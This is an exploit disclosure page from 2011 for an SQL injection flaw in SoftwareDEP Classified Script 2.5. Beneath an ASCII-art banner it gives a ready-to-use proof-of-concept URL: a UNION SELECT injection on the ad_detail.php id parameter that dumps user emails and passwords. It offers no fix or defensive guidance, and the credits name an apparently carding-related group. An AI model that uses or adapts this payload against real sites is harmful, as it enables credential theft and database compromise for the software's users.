Home / exploitsPDF  

SoftwareDEP Classified Script 2.5 SQL Injection

Posted on 18 August 2011

) ) ) ( ( ( ( ( ) ) ( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /( )())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )()) ((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_)\n__ ((_)((_)/(_))___ ((_) _ ) )\___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) / / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ / V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' < |_| \___/ \___| |_| /_/ \_ \___/_/ \_|_|_|___/|___|_|_\____|___||_|\_|_|\_\n.WEB.ID ----------------------------------------------------------------------- SoftwareDEP Classified Script SQL Injection Vulnerability Author : v3n0m Discovered : August, 16-2011 GMT +7:00 Jakarta, Indonesia Software : Classified Script Developer : http://www.softwaredep.com/ Price : $199 Version : 2.5 Lower versions may also be affected ----------------------------------------------------------------------- PoC: --- http://domain.tld/[path]/ad_detail.php?id=-9999+union+select+1,2,3,4,concat(email,char(58),password),version(),7,8,9,10,11,12,13,14,15,16,17,18,19+from+user-- Credits: ------- www.yogyacarderlink.web.id - irc.yogyacarderlink.web.id

 

TOP